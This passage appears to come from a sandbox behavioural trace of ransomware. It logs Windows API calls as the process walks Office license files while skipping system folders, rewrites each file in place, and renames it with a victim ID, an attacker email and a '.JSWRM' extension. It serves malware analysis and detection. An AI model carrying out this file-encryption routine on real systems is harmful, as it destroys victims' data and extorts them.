office\\root\\licenses16\\projectstdco365r_subtest-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.231] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11633) returned 1 [0108.231] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0108.231] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0108.233] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.233] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0108.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.233] CloseHandle (hObject=0x45c) returned 1 [0108.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0108.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0108.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0108.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0108.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0108.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0108.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.234] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtest-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTest-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtest-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0108.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0108.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0108.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.235] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe98d2bc9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe98d2bc9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe99ddc4b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bb7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdCO365R_SubTrial-pl.xrm-ms", cAlternateFileName="PR5EEC~1.XRM")) returned 1 [0108.235] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-pl.xrm-ms", lpString2=".") returned 1 [0108.235] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-pl.xrm-ms", lpString2="..") returned 1 [0108.235] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-pl.xrm-ms", lpString2="...") returned 1 [0108.235] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-pl.xrm-ms", lpString2="windows") returned -1 [0108.235] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-pl.xrm-ms", lpString2="recovery") returned -1 [0108.235] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.235] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.235] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.235] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.235] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-pl.xrm-ms", lpString2="msocache") returned 1 [0108.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0108.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTrial-pl.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0108.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTrial-pl.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0108.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0108.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0108.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTrial-pl.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0108.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTrial-pl.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0108.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0108.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0108.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0108.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0108.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtrial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.268] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11191) returned 1 [0108.269] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0108.269] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0108.271] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.271] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0108.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.271] CloseHandle (hObject=0x45c) returned 1 [0108.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0108.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0108.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0108.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0108.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0108.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0108.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.272] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtrial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTrial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtrial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0108.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0108.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0108.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.273] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe983a24f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe983a24f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe98d2bc9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5173, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdCO365R_SubTrial-ppd.xrm-ms", cAlternateFileName="PR41E5~1.XRM")) returned 1 [0108.273] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ppd.xrm-ms", lpString2=".") returned 1 [0108.273] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ppd.xrm-ms", lpString2="..") returned 1 [0108.273] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ppd.xrm-ms", lpString2="...") returned 1 [0108.273] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ppd.xrm-ms", lpString2="windows") returned -1 [0108.273] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.273] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.273] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.273] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.273] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.273] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0108.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTrial-ppd.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0108.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTrial-ppd.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0108.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0108.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0108.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTrial-ppd.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0108.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTrial-ppd.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0108.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0108.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0108.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0108.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0108.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtrial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.275] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20851) returned 1 [0108.275] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5170) returned 0x24c1d0 [0108.275] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5170, lpOverlapped=0x0) returned 1 [0108.312] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.312] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5170, lpOverlapped=0x0) returned 1 [0108.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.312] CloseHandle (hObject=0x45c) returned 1 [0108.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0108.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0108.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0108.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0108.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0108.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0108.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.313] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtrial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTrial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtrial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0108.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0108.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0108.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.328] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe98f8e19, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe98f8e19, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9a03ebf, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d76, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", cAlternateFileName="PR6C97~1.XRM")) returned 1 [0108.328] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.328] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.328] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.328] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.328] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.328] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.328] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.328] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.328] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.328] lstrcmpiW (lpString1="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0108.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0108.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0108.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0108.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0108.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0108.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=39, 